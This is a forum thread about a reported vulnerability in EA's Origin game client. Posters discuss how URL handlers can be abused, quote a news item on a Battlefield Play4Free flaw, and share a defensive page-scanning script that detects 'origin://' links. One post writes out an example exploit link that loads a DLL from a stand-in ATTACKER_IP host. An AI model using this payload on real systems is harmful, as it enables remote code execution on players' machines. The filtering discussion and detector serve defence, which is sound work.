BBC News - Players at risk from game store hack attack
I hate origin. I reluctantly caved and installed it to play Battlefield 3. Wish I never bothered now.

The funny thing is... Steam had this exact problem a while back. [Which was fixed pretty quickly.]
EA didn't even bother to check if it was possible with Origin, based on their remote launch method being a copy of Steam's, and pre-patch it.

Great. At least I had Battlefield 3 for Free as I was a SimCity disaster case.
Who knows, all I know is, respect who they are or face the consequences!
@SovietRussia
I pulled out DS3BF3 = too many bugs

I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning?
Yes, if something registers as a URL handler then the browser (depends) will prompt you what you want to happen the first time you click such a link. Most people don't read what they are being told and worse click the 'always do this for links like this' too. At which point the URL handler has basically the same level of access as a browser plugin.
I don't imagine it'll be a big deal in most school environments but more generally I think you should pull up an 'average' machine and just check what URL handlers you have installed (Java I'm looking at you). There's also scope for your web filter picking up 'odd' URL links. Someone like @tom_newton would know more I imagine.
Last edited by Geoff; 19th March 2013 at 01:18 PM.

Sort of.
Code:
origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll
^ That would download a DLL from a remote location without your input. But, it could [I think] be modified to do pretty much anything. Especially, if you set it to download a lot of malicious files and a script to run them.
"There is no evidence the loophole has yet been used by malicious hackers."
But for how long, now that it's out, 'eh?
I think I have an origin account. Think. I had one of the BF games, can't remember which. Don't play it much anyway.
Honestly I haven't bought anything EA in a while. Not because of any boycotts, just because I haven't xD
Though I did get a free copy of Dead Space 3 for putting up with Sim City and a free copy of BF3 from an AMD card I bought a while back. EA is like drugs to me. They make a few good games that I love to play (BF3, Tomb Raider, Sim City) but buying them and supporting them is destroying my humanity. The gaming community really needs to protest this but I know it will never happen.


The only way to catch these in filtering is actually to look in-page (possible with your smoothie!). It's computationally cheap to "block any page containing origin://" - much more expensive to "find and replace" it out. Either is possible, but be kind to your CPU and use the "block" method.
Of course by the time someone clicks the link, all bets are off, as the handler needn't obey proxy rules.
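
The in-page "block" check described in the post above, sketched as an added example (not part of the thread and not any filter product's own code). It goes slightly beyond a literal substring match by also catching the scheme when it is entity-encoded, mixed-case or inside a meta refresh; the function names, attribute list and sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

BLOCKED_SCHEMES = {"origin"}  # scheme named in the thread; extend as needed
URL_ATTRS = {"href", "src", "action", "data", "content"}

def blocked_scheme(value):
    """Return the blocked scheme a URL attribute resolves to, or None."""
    # HTMLParser has already decoded entities. Drop whitespace and control
    # characters (browsers ignore tab/CR/LF inside URLs) and fold case.
    cleaned = re.sub(r"[\x00-\x20]", "", value).lower()
    # <meta http-equiv=refresh content="0; url=..."> puts the URL after a prefix.
    cleaned = re.sub(r"^\d+[;,]url=['\"]?", "", cleaned)
    m = re.match(r"([a-z][a-z0-9+.\-]*):", cleaned)
    return m.group(1) if m and m.group(1) in BLOCKED_SCHEMES else None

class SchemeScanner(HTMLParser):
    """Collect (tag, attribute, scheme) for each blocked-scheme URL attribute."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and blocked_scheme(value):
                self.hits.append((tag, name, blocked_scheme(value)))

def scan_page(html):
    """Return findings for one page body; an empty list means the page passes."""
    scanner = SchemeScanner()
    scanner.feed(html)
    scanner.close()
    findings = list(scanner.hits)
    if not findings:
        # Fallback: literal scheme in raw text, e.g. a link built by inline script.
        for scheme in sorted(BLOCKED_SCHEMES):
            if re.search(r"\b" + re.escape(scheme) + r"://", html, re.I):
                findings.append(("raw", "text", scheme))
    return findings

# Constructed sample pages (not from the thread); the game id is a placeholder.
SAMPLES = {
    "benign": '<a href="https://example.com/origin-story">read</a>',
    "plain": '<a href="origin://LaunchGame/0000">play</a>',
    "entity": '<a href="&#79;RIGIN://LaunchGame/0000">play</a>',
    "tab": '<iframe src="ori&#9;gin://LaunchGame/0000"></iframe>',
    "refresh": '<meta http-equiv="refresh" content="0; url=origin://LaunchGame/0000">',
    "script": '<script>location="origin://LaunchGame/0000"</script>',
}
if __name__ == "__main__":
    for name, page in SAMPLES.items():
        print(name, "BLOCK" if scan_page(page) else "pass", scan_page(page))
```

As the post notes, this only covers pages that pass through the filter; once the handler is launched, its own traffic need not go via the proxy.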

Here's a new one...
Bug in EA's Battlefield Play4Free allows attackers to hijack players' PCs « Ars Technica
"The ReVuln researchers identified the root cause of the vulnerability as the way Play4Free invokes an update mechanism. It allows attackers to use the CreateProcessW Windows API to inject a series of variables into commands that allows them to override the whitelist protection. The end result is the ability to upload a batch file to the Windows startup folder of vulnerable machines. The file is automatically executed the next time the computer is rebooted, and depending on its contents, it can install a host of malicious software."
Obviously only an issue if you play Battlefield P4F on Windows XP. At this point, you deserve what you get if you are playing games on such an old operating system.